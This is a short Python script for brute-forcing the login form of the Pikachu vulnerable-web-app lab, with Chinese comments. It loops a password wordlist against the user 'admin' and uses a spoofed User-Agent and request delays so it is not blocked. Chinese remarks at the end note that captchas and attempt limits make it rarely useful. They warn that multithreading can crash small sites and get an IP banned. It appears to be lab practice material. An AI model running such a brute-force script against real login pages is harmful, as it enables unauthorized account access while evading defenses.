import requests
import time

# 目标URL
url = "http://192.168.3.101/pikachu/vul/burteforce/bf_form.php"  # 请替换为实际的目标URL

# 已知的用户名
username = "admin"

# 密码字典文件路径
password_file = "passwords.txt"

# 伪造请求头，避免被拦截
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
}


def login_attempt(username, password):
    session = requests.Session()
    response = session.get(url, headers=headers)

    # 构建表单数据
    data = {
        'username': username,
        'password': password,
        'submit': 'Login',
    }

    # 发送POST请求
    response = session.post(url, data=data, headers=headers)

    # 将返回的页面写入文件（调试用）
    with open('response.txt', 'w', encoding='utf-8') as f:
        f.write(response.text)

    # 检查是否登录成功
    if "login success" in response.text.lower():
        print(f"[+] Password found: {password}")
        return True
    else:
        print(f"[-] Incorrect password: {password}")
        return False


# 读取密码字典文件
with open(password_file, 'r', encoding='utf-8') as file:
    for password in file.readlines():
        password = password.strip()

        # 尝试登录
        if login_attempt(username, password):
            break

        # 适当延迟请求，避免被封
        time.sleep(1)

但是话说回来，这样的纯小子后台已经不多了，大部分加了验证码或者尝试登录次数的判定，所以也没什么用处

这个不建议改多线程，小网站的话真的会被扫崩掉，大网站也有封ip的风险